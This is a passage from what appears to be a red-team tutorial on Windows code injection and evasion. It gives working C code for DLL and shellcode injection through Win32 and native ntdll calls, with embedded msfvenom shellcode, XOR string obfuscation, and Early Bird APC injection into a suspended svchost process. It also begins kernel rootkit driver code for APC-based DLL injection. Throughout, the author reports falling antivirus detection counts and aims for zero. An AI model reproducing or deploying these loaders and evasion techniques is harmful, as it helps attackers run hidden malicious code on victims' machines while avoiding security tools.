LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx)ntCreateThreadExAddr;
NTSTATUS status = funNtCreateThreadEx(
    &hRemoteThread,
    0x1FFFFF,
    NULL,
    hHandle,
    (LPTHREAD_START_ROUTINE)loadLibAddr,
    dllPathAddr,
    FALSE,
    NULL,
    NULL,
    NULL,
    &ntbuffer
);

This method, though more complex, can be useful when you need to evade detection or when CreateRemoteThread() doesn’t work due to security restrictions.

At this point, we’ve successfully attached to a process, allocated memory in its space, copied over our DLL (or its path), and executed it. Whether you use LoadLibraryA() or jump directly to DllMain, the target process is now running code injected from your DLL. The code might be malicious or could be used for something benign like debugging or monitoring.

DLL injection, just like process hollowing or IAT hooking, is all about gaining control over another process’s execution. Each of these methods has its own strengths and weaknesses, but they all boil down to the same principle: controlling the memory and execution flow of a target process, turning it into something else. In this case, that “something else” is a process now executing code you’ve placed there via your injected DLL.

From here, the options are wide open: you could manipulate the behavior of the target process, monitor its activity, or even hijack its resources for your own purposes.

The Shellcode Playbook

Alright, let’s put on the red team cap and step right into the world of injections, blending benign code with the more covert, sneaky techniques to carry out our objectives. First, we’ll look at what seems like normal code, break down what’s happening, and then transition toward more advanced, low-level techniques seen out in the wild.

Let’s start with some completely legitimate-looking code that simply spawns a new Notepad process using CreateProcessW. The goal is to get comfortable with how processes are launched in Windows.

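#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(void){

    STARTUPINFOW si = {0};
    PROCESS_INFORMATION pi = {0};
    si.cb = sizeof(si); // the API expects the structure size to be filled in

    if(!CreateProcessW(
        L"C:\\Windows\\System32\\notepad.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        BELOW_NORMAL_PRIORITY_CLASS,
        NULL,
        NULL,
        &si,
        &pi
)){
        // GetLastError() returns a DWORD, so print it as unsigned long
        printf("(-) failed to create process, error: %lu\n", GetLastError());
        return EXIT_FAILURE;
    }

    printf("(+) process started! PID: %lu\n", pi.dwProcessId);

    // Release the handles returned in PROCESS_INFORMATION
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return EXIT_SUCCESS;
}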

This piece of code is completely benign: it just spawns a Notepad process with a below-normal priority. We’re using CreateProcessW, which is part of the Windows API, to start this new process. Nothing fancy here, just a simple process creation that anyone using the Windows API would do. It’s above board and should raise no alarms, but it’s our starting point.

Now, here’s where things start to get fun. For reference, this is the CreateProcessW prototype from the Windows API documentation:

BOOL CreateProcessW(
  [in, optional]      LPCWSTR               lpApplicationName,
  [in, out, optional] LPWSTR                lpCommandLine,
  [in, optional]      LPSECURITY_ATTRIBUTES lpProcessAttributes,
  [in, optional]      LPSECURITY_ATTRIBUTES lpThreadAttributes,
  [in]                BOOL                  bInheritHandles,
  [in]                DWORD                 dwCreationFlags,
  [in, optional]      LPVOID                lpEnvironment,
  [in, optional]      LPCWSTR               lpCurrentDirectory,
  [in]                LPSTARTUPINFOW        lpStartupInfo,
  [out]               LPPROCESS_INFORMATION lpProcessInformation
);

We’re not inventing something entirely new; instead, we’re refining existing code droppers and loaders for Windows targets, making them responsive to our session commands.

Our goal here is to run unrestricted shellcode. We rely on four Windows API functions: OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Each function plays a specific role in enabling the shellcode to do its job. We’re in charge, and the Windows targets should be ready to follow our instructions.

int main()
{
    STARTUPINFOW si = {0};
    PROCESS_INFORMATION pi = {0};
    
(!CreateProcessW(
        L"C:\\Windows\\System32\\notepad.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        BELOW_NORMAL_PRIORITY_CLASS,
        NULL,
        NULL,
        &si,
        &pi
));
  
  char shellcode[] ={
  };

    HANDLE hProcess; 
    HANDLE hThread;
    void*exec_mem;
    hProcess = OpenProcess(PROCESS_ALL_ACCESS,TRUE,pi.dwProcessId);
    exec_mem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, exec_mem, shellcode, sizeof(shellcode), NULL);
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL,0,0);
    CloseHandle(hProcess);
    return 0;
}

This code does a bit more than just start Notepad. It spawns the process, grabs a handle to it, allocates some memory inside of it, and writes some shellcode directly into the process’s memory. Then it uses CreateRemoteThread to execute that shellcode. Now we’ve crossed the line from benign to malicious. This is basic process injection.

However, plaintext (msf) shellcode tends to raise red flags and is susceptible to detection by AV engines. If you want to develop your own x64 shellcode, take a look at “Windows x64 Shellcode Development”.

This code is simple and can be swiftly pinpointed by AV engines. So, let’s explore an alternative play here: how about placing the shellcode into Read-Write-Execute (RWX) memory to launch Notepad?

The RWX memory approach is fairly simple for our intended purpose. It involves searching a process’s private virtual memory space (the userland virtual memory space) for a memory region marked as PAGE_EXECUTE_READWRITE. If such a region is found, it’s returned. If not, the search address is advanced to the next memory region (BaseAddress + RegionSize).

To finalize this for code execution, our shellcode must then be copied to that memory region and executed. An efficient way to achieve this is to resort to WinAPI calls, similar to what we demonstrated in the first technique:

int main(int argc, char * argv[])  
{  
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c  
    unsigned char shellcode[] =  
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
        
    int newPid = atoi(argv[1]);  
    printf("Injecting into pid %d\n", newPid);  
  
    HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);  
    if (!pHandle)  
    {  
        printf("Invalid Handle\n");  
        exit(1);  
    }  
    LPVOID remoteBuf = VirtualAllocEx(pHandle, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
    if (!remoteBuf)  
    {  
        printf("Alloc Fail\n");  
        exit(1);  
    }  
    printf("alloc addr: %p\n", remoteBuf);  
    WriteProcessMemory(pHandle, remoteBuf, shellcode, sizeof(shellcode), NULL);  
    CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuf, NULL, 0, NULL);  
    return 0;  
}

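Let’s move away from the documented Win32 functions and call the undocumented functions exported by ntdll.dll directly. This takes us one level lower, right above the system calls themselves.

We need three functions: NtAllocateVirtualMemory, NtWriteVirtualMemory, and NtCreateThreadEx.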

Since these APIs are not documented by Microsoft, we need to find some external references made by reverse engineers. http://undocumented.ntinternals.net/

Let’s look at the definition of an NTAPI function from the reference link:

NTSYSAPI   
NTSTATUS  
NTAPI  
  
NtAllocateVirtualMemory(  
  
  
  IN HANDLE               ProcessHandle,  
  IN OUT PVOID            *BaseAddress,  
  IN ULONG                ZeroBits,  
  IN OUT PULONG           RegionSize,  
  IN ULONG                AllocationType,  
  IN ULONG                Protect );

NTSTATUS is the actual return value, while NTSYSAPI marks the function as a library import and NTAPI defines the Windows API calling convention.

IN means the function requires the parameter as input, while OUT means that the parameter passed in is modified with some return output. When we prototype the functions, we just need to note the NTAPI part. In fact, you can also use WINAPI, since both of them resolve to __stdcall.
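To make the NTSTATUS return type a little more concrete, here is a small portable sketch of how such a value is usually interpreted. The names NTSTATUS_T, ST_*, nt_success, nt_severity, and nt_severity_name are my own and purely illustrative. The typedef is a stand-in so the snippet compiles without windows.h, and nt_success mirrors the NT_SUCCESS macro from the Windows headers.

```c
#include <assert.h>
#include <stdint.h>

/* Stand-in for the Windows NTSTATUS type (a signed 32-bit value). */
typedef int32_t NTSTATUS_T;

/* A few well-known status codes, under illustrative names. */
#define ST_SUCCESS          ((NTSTATUS_T)0x00000000)
#define ST_BUFFER_OVERFLOW  ((NTSTATUS_T)0x80000005)  /* warning */
#define ST_ACCESS_DENIED    ((NTSTATUS_T)0xC0000022)  /* error   */

/* Same test as NT_SUCCESS: success and informational codes are non-negative. */
static int nt_success(NTSTATUS_T status)
{
    return status >= 0;
}

/* The top two bits hold the severity:
   0 = success, 1 = informational, 2 = warning, 3 = error. */
static unsigned nt_severity(NTSTATUS_T status)
{
    return ((uint32_t)status) >> 30;
}

/* Human-readable severity, handy when printing a status with %X. */
static const char *nt_severity_name(NTSTATUS_T status)
{
    static const char *names[] = { "success", "informational", "warning", "error" };
    unsigned sev = nt_severity(status);
    assert(sev < 4);  /* two bits can only encode 0..3 */
    return names[sev];
}
```

When a status is printed with %X, a leading C (as in C0000022) therefore means an error and a leading 8 means a warning, which is usually the first thing worth checking when a native call misbehaves.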

typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);  
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);  
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);

Here we prototype some function pointers that we’ll later map to the addresses of the actual functions in ntdll.dll. You might notice that some types are also missing, for example POBJECT_ATTRIBUTES, so let’s find and define them from the references.

typedef struct _UNICODE_STRING {  
    USHORT Length;  
    USHORT MaximumLength;  
    PWSTR  Buffer;  
} UNICODE_STRING, *PUNICODE_STRING;  
  
typedef struct _OBJECT_ATTRIBUTES {  
    ULONG           Length;  
    HANDLE          RootDirectory;  
    PUNICODE_STRING ObjectName;  
    ULONG           Attributes;  
    PVOID           SecurityDescriptor;  
    PVOID           SecurityQualityOfService;  
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;  
  
typedef struct _PS_ATTRIBUTE {  
    ULONG Attribute;  
    SIZE_T Size;  
    union {  
        ULONG Value;  
        PVOID ValuePtr;  
    } u1;  
    PSIZE_T ReturnLength;  
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;  
  
typedef struct _PS_ATTRIBUTE_LIST  
{  
    SIZE_T       TotalLength;  
    PS_ATTRIBUTE Attributes[1];  
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;

These allow us to map the addresses of the actual system calls in ntdll.dll. Now, let’s map them and use them:

HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");  
if (!hNtdll)  
{  
    printf("Load ntdll fail\n");  
    exit(1);  
}  
  
NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");  
NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");  
NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");

Now we can bypass the higher-level APIs and call these lower-level functions directly. We’re still allocating memory, writing to it, and creating a thread, but now we’re doing it one layer down. This may sidestep monitoring that only watches the higher-level Win32 APIs, although many security products hook ntdll.dll as well.

typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);  
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);  
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);  
  
int main(int argc, char * argv[])  
{  
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c  
    unsigned char shellcode[] =  
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
     
	int newPid = atoi(argv[1]);  
	printf("Injecting into pid %d\n", newPid);  
  
    HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);  
    if (!pHandle)  
    {  
        printf("Invalid Handle\n");  
        exit(1);  
    }  
    HANDLE tHandle;  
    HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");  
    if (!hNtdll)  
    {  
        printf("Load ntdll fail\n");  
        exit(1);  
    }  
  
    NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");  
    NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");  
    NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");  
    void * allocAddr = NULL;  
    SIZE_T allocSize = sizeof(shellcode);  
    NTSTATUS status;  
    status = NtAllocateVirtualMemory(pHandle, &allocAddr, 0, (PULONG)&allocSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
    printf("status alloc: %X\n", status);  
    printf("alloc addr: %p\n", allocAddr);  
    status = NtWriteVirtualMemory(pHandle, allocAddr, shellcode, sizeof(shellcode), NULL);  
    printf("status write: %X\n", status);  
    status = NtCreateThreadEx(&tHandle, GENERIC_EXECUTE, NULL, pHandle, allocAddr, NULL, 0, 0, 0, 0, NULL);  
    printf("status exec: %X\n", status);  
  
	return 0;  
}

So, if you decide to upload this to VirusTotal (which I don’t recommend, but the choice is yours), what can you expect? You might see 27 out of 72 engines flagging it. Why is that? For starters, the raw shellcode and the use of functions like NtAllocateVirtualMemory, NtWriteVirtualMemory, and NtCreateThreadEx are common in malware and are associated with known patterns.

As I mentioned, msf shellcode is a giveaway, but let’s try something else. It’s time to dust off some classic techniques that never go out of style. Yes, XOR encryption is a method you’re probably familiar with when it comes to encrypting shellcode. When XOR encryption is applied to shellcode, a key is carefully selected to XOR every byte of the shellcode. To decrypt the shellcode, you simply use the same key to XOR each byte once more.

The XOR operation is reversible, which allows for both the encryption process and the restoration of the original shellcode. However, it’s worth noting that XOR encryption can be quite straightforward for a reverser. If you’re up for a challenge, check out the one I posted a while back: ReverseMeCipher, which involves XOR encryption. As a general rule, it’s often wiser to combine XOR encryption with other methods.
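To see why XOR is both convenient and weak, here is a small self-contained sketch on a harmless text buffer. The helper names xor_buffer and recover_key are hypothetical and not part of the original tooling. The first shows that applying the same key twice restores the input, and the second shows how a single known plaintext byte gives away a single-byte key.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* XOR every byte of buf in place with a single-byte key.
   Calling this twice with the same key restores the original bytes. */
static void xor_buffer(unsigned char *buf, size_t len, unsigned char key)
{
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}

/* Known-plaintext recovery: since c = p ^ k, it follows that k = c ^ p.
   One correctly guessed plaintext byte is enough to reveal the key. */
static unsigned char recover_key(unsigned char cipher_byte,
                                 unsigned char known_plain_byte)
{
    return (unsigned char)(cipher_byte ^ known_plain_byte);
}
```

For example, XOR-ing the text "hello world" with 0x53 and then calling recover_key on the first output byte with the guess 'h' returns 0x53 again. This is exactly the shortcut an analyst takes when they can guess even a small part of the plaintext, and it is why single-byte XOR should be treated as obfuscation rather than encryption.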

First, we want to remove strings and debug symbols. Running the strings command on our executable reveals strings such as “NtCreateThreadEx.” We can hide these by XOR-encrypting them and decrypting them at runtime. We start with the function responsible for encryption and decryption.

unsigned char * rox(unsigned char *, int, int);
unsigned char * rox(unsigned char * data, int dataLen, int xor_key)
{
    unsigned char * output = (unsigned char *)malloc(sizeof(unsigned char) * dataLen + 1);

    for (int i = 0; i < dataLen; i++)
        output[i] = data[i] ^ xor_key;

    return output;
}

The same function handles both encryption and decryption: if you XOR the encrypted data with the same xor_key, it reverts to the original data. A separate helper just formats the encrypted output nicely so we can copy and paste it, and this one function is all we need in the actual injector.

const char* ntdll_str = (const char*)ntdll;
const char* navm_str = (const char*)navm;
const char* nwvm_str = (const char*)nwvm;
const char* ncte_str = (const char*)ncte;

As we said, strings such as NtCreateThreadEx are telling and can lead to antivirus (AV) detection. One way to obfuscate these strings and make them less detectable is to XOR-encrypt them, and then decrypt them at runtime when they are needed:

unsigned char ntdll_data[] = {0x3d, 0x27, 0x37, 0x3f, 0x3f, 0x7d, 0x37, 0x3f, 0x3f, 0x53};
unsigned char *ntdll = rox(ntdll_data, 10, 0x53);

Let’s use VirusTotal again and check the detection rate.

While reducing the number of detections from 27 down to 9 is indeed a notable improvement, it’s essential to recognize that this level of evasion is still relatively basic, especially when relying on tools like msfvenom to achieve our goals.

Now, it’s time to explore a new code injection technique called “Early Bird.” This method was used by a group known as APT33. It works by taking advantage of the application threading process that occurs when a program executes on a computer. In other words, attackers inject malware code into legitimate process threads in an effort to hide malicious code within commonly seen and legitimate processes.

We will use functions like VirtualAllocEx, WriteProcessMemory, and ResumeThread. Before the shellcode is injected, it goes through an AES decryption routine. That routine uses the Windows Cryptography API (starting with CryptAcquireContextW) to decrypt the payload using a predefined key.

int AESDecrypt(unsigned char* payload, DWORD payload_len, char* key, size_t keylen) {

HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;

BOOL CryptAcquire = CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
if (CryptAcquire == false) {
//printf("CryptAcquireContextW Failed: %d\n", GetLastError());
return -1;
}

BOOL CryptCreate = CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);
if (CryptCreate == false) {
//printf("CryptCreateHash Failed: %d\n", GetLastError());
return -1;
}

  
BOOL CryptHash = CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0);
if (CryptHash == false) {
//printf("CryptHashData Failed: %d\n", GetLastError());
return -1;
}

  

BOOL CryptDerive = CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);
if (CryptDerive == false) {
//printf("CryptDeriveKey Failed: %d\n", GetLastError());
return -1;
}

  

BOOL Crypt_Decrypt = CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, payload, &payload_len);
if (Crypt_Decrypt == false) {
//printf("CryptDecrypt Failed: %d\n", GetLastError());
return -1;
}

  

CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);

return 0;
}

The AES decryption routine ensures that the injected shellcode is in its original, unencrypted form, which is essential for executing it within the target process.

Next, we resolve CreateProcessW dynamically:

pfnCreateProcessW pCreateProcessW = (pfnCreateProcessW)GetProcAddress(GetModuleHandleW(L"KERNEL32.DLL"), "CreateProcessW");
if (pCreateProcessW == NULL) {
    // Handle error if the function cannot be found
}

STARTUPINFOW si;
PROCESS_INFORMATION pi;

// Clear out startup and process info structures
RtlSecureZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
RtlSecureZeroMemory(&pi, sizeof(pi));

std::wstring pName = L"C:\\Windows\\System32\\svchost.exe";

HANDLE pHandle = NULL;
HANDLE hThread = NULL;
DWORD Pid = 0;

BOOL cProcess = pCreateProcessW(NULL, &pName[0], NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

The CreateProcessW function is invoked to create a new process, which in this case runs svchost.exe. The important detail is the CREATE_SUSPENDED creation flag: the primary thread of the new process is created in a suspended state and does not run until ResumeThread is called. After successfully creating the suspended process, the code retrieves the process and thread handles. These handles are crucial for further manipulation of the newly created process.

pHandle = pi.hProcess;
hThread = pi.hThread;
Pid = pi.dwProcessId;

With the suspended process and its associated handles in place, we are ready to proceed with the code injection, which involves injecting shellcode into the memory space of the newly created process.

Creating the process in a suspended state lets us inject code and manipulate the process without raising immediate suspicion. We will inject the shellcode into the suspended process, so that it ultimately executes within the context of the target process’s thread. Before injecting the shellcode, however, memory must be allocated within the target process to accommodate the injected code. This allocation is done using the VirtualAllocEx function.

LPVOID memAlloc = pVirtualAllocEx(pHandle, 0, scSize, MEM_COMMIT, PAGE_EXECUTE_READ);

The shellcode, which was previously decrypted, is now written into the allocated memory space within the target process using the WriteProcessMemory function.

DWORD wMem = pWriteProcessMemory(pHandle, (LPVOID)memAlloc, shellcode, scSize, &bytesWritten);

With the shellcode successfully injected into the target process’s memory, the code prepares for its execution. This is done using the QueueUserAPC function, which enqueues the shellcode for execution within the context of a specific thread within the target process.

if (pQueueUserAPC((PAPCFUNC)memAlloc, hThread, NULL)) {
    pResumeThread(hThread);
}

Now, let’s verify the success of our play by injecting the shellcode into a suspended process and manipulating the memory space within the context of the process’s thread.

Out of 72 engines, we’re now down to just 5 detections. We started with 27 detections, dropped that to 9, and now we’re sitting at 5. I’m pretty sure we can push it down to zero. This demonstrates the importance of having a diverse range of techniques in your toolkit.

But here’s the thing: while having a low detection rate—whether it’s 5 or even zero—on your payload is great, it doesn’t necessarily mean you’re being truly evasive. What I mean is, it’s not just about the payload. Sure, it plays a significant role, but what you do after gaining access is what really matters.

You can have a payload with zero detections that slips right past common AV or EDR engines. But once you’ve got shell access, you can’t just go dumping Mimikatz all over the place; that’s a quick way to burn your access, as even the most basic AV or EDR will flag that instantly.

So, yes, having a variety of techniques and knowing how to manipulate code is important. But understanding how to navigate through the system without raising red flags? That’s the difference between a skilled operator and an amateur.

Writing a Simple Rootkit

Kernel-mode rootkits are the stealthy ninjas of the operating system realm, lurking in the shadows at the most privileged level—Ring 0. Here lies the true power of the system, where rootkits gain direct access to hardware and system resources, executing their nefarious deeds without a trace. Imagine it as possessing the ultimate backstage pass to every intricate detail within a system’s operations.

Conversely, we have user-mode rootkits, hanging out in Ring 3. While they wield less power due to their lower privileges, they still pose a threat. User-mode rootkits can perform certain maneuvers, but they often rely on their kernel-mode counterparts to elevate privileges or maintain a cloak of invisibility.

Kernel-mode rootkits achieve stealth by injecting their own code into system drivers to intercept or modify I/O Request Packets (IRPs). This manipulation can facilitate various malicious actions, such as hiding files and processes or redirecting system calls. Our mission? To dive deep into these techniques and learn to craft our own!

Writing a Windows Device Driver

Let’s kick things off by writing a simple Windows device driver that prints “Hello World!” to the kernel debugger:

#include "ntddk.h"

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    DbgPrint("Hello World!");
    return STATUS_SUCCESS;
}

While simple, this serves as our foundation. To move on to more complex tasks, we need to understand I/O Request Packets (IRPs), the structures used for communication between user-mode programs and kernel-mode drivers.

When a user-mode application performs operations, like writing to a file handle, the kernel creates an IRP to manage this transaction. To effectively process IRPs, drivers must define handling functions, like this one:

NTSTATUS OnStubDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    Irp->IoStatus.Status = STATUS_SUCCESS;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

In a real-world driver, the major function pointers, indexed by codes such as IRP_MJ_CREATE, IRP_MJ_CLOSE, and IRP_MJ_DEVICE_CONTROL, would handle specific IRP types, enabling complex interactions with the driver.

Creating a File Handle

User-mode programs interact with kernel drivers through file handles. To use a kernel driver, the user-mode app must open a file handle to it. Here’s how we register a device named “MyDevice”:

const WCHAR deviceNameBuffer[] = L"\\Device\\MyDevice";
PDEVICE_OBJECT g_RootkitDevice; // Global pointer to our device object

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    NTSTATUS ntStatus;
    UNICODE_STRING deviceNameUnicodeString;

    RtlInitUnicodeString(&deviceNameUnicodeString, deviceNameBuffer);

    ntStatus = IoCreateDevice(DriverObject, 0, &deviceNameUnicodeString, 0x00001234, 0, TRUE, &g_RootkitDevice);
    // ...
}

A user-mode application can open this device using a fully qualified path like \\Device\\MyDevice. This file handle allows interaction with functions like ReadFile and WriteFile, generating IRPs for communication.

Understanding the interplay between user-mode and kernel-mode via IRPs and file handles is fundamental for crafting effective Windows device drivers, a crucial concept in the world of kernel-mode rootkits.

Remember DLL injection? Now, let’s take a look at its use by rootkits, which drive the injection from a custom device driver running in the Windows kernel. In the context of the previously discussed device driver and rootkit concepts, we can explore how kernel-mode DLL injection fits into the picture:

Kernel-Mode DLL

The process typically begins with the DriverEntry function, which is the entry point for our driver. Here’s how we start:

NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverobject, IN PUNICODE_STRING pRegister)
{

NTSTATUS st;
  
PsSetLoadImageNotifyRoutine(&LoadImageNotifyRoutine);

pDriverobject->DriverUnload = (PDRIVER_UNLOAD)Unload;
  
return STATUS_SUCCESS;
}

Using PsSetLoadImageNotifyRoutine, we register a callback that fires whenever an image is loaded, which lets us watch for critical system DLLs, such as kernel32.dll, being mapped into a process’s address space.

Plus, we set the driver’s unload function (pDriverobject->DriverUnload) to handle cleanup operations when the driver is unloaded. This ensures that any resources or callbacks registered during the driver’s lifetime are properly managed.

Image Load Notification

Our monitoring hinges on image load notifications. The LoadImageNotifyRoutine function checks if kernel32.dll is being loaded:

VOID LoadImageNotifyRoutine(IN PUNICODE_STRING ImageName, IN HANDLE ProcessId, IN PIMAGE_INFO pImageInfo)
{
    if (ImageName != NULL)
    {
        // Check if the loaded image matches the name of kernel32.dll
        WCHAR kernel32Mask[] = L"*\\KERNEL32.DLL";
        UNICODE_STRING kernel32us;
        RtlInitUnicodeString(&kernel32us, kernel32Mask);

        if (FsRtlIsNameInExpression(&kernel32us, ImageName, TRUE, NULL))
        {
            PKAPC Apc;
            
            if (Hash.Kernel32dll == 0)
            {
                // Initialize the Hash structure and import the function addresses
                Hash.Kernel32dll = (PVOID)pImageInfo->ImageBase;
                Hash.pvLoadLibraryExA = (fnLoadLibraryExA)ResolveDynamicImport(Hash.Kernel32dll, SIRIFEF_LOADLIBRARYEXA_ADDRESS);
            }

            // Create an Asynchronous Procedure Call (APC) to initiate DLL injection
            Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
            if (Apc)
            {
                KeInitializeApc(Apc, KeGetCurrentThread(), 0, (PKKERNEL_ROUTINE)APCInjectorRoutine, 0, 0, KernelMode, 0);
                KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
            }
        }
    }
    return;
}

The LoadImageNotifyRoutine function plays a pivotal role in our DLL injection process. It checks if the ImageName parameter is not NULL, ensuring that we are actively monitoring loaded images with names. Furthermore, we examine if the loaded image matches the name of kernel32.dll.

If a match is found, we proceed with initializing the Hash structure and creating an Asynchronous Procedure Call (APC) using the APCInjectorRoutine. The APC serves as a mechanism to trigger the DLL injection process into a target process.

These code snippets are instrumental in monitoring and responding to the loading of kernel32.dll and lay the groundwork for our upcoming discussion on kernel-mode DLL injection.

Unloading the Driver

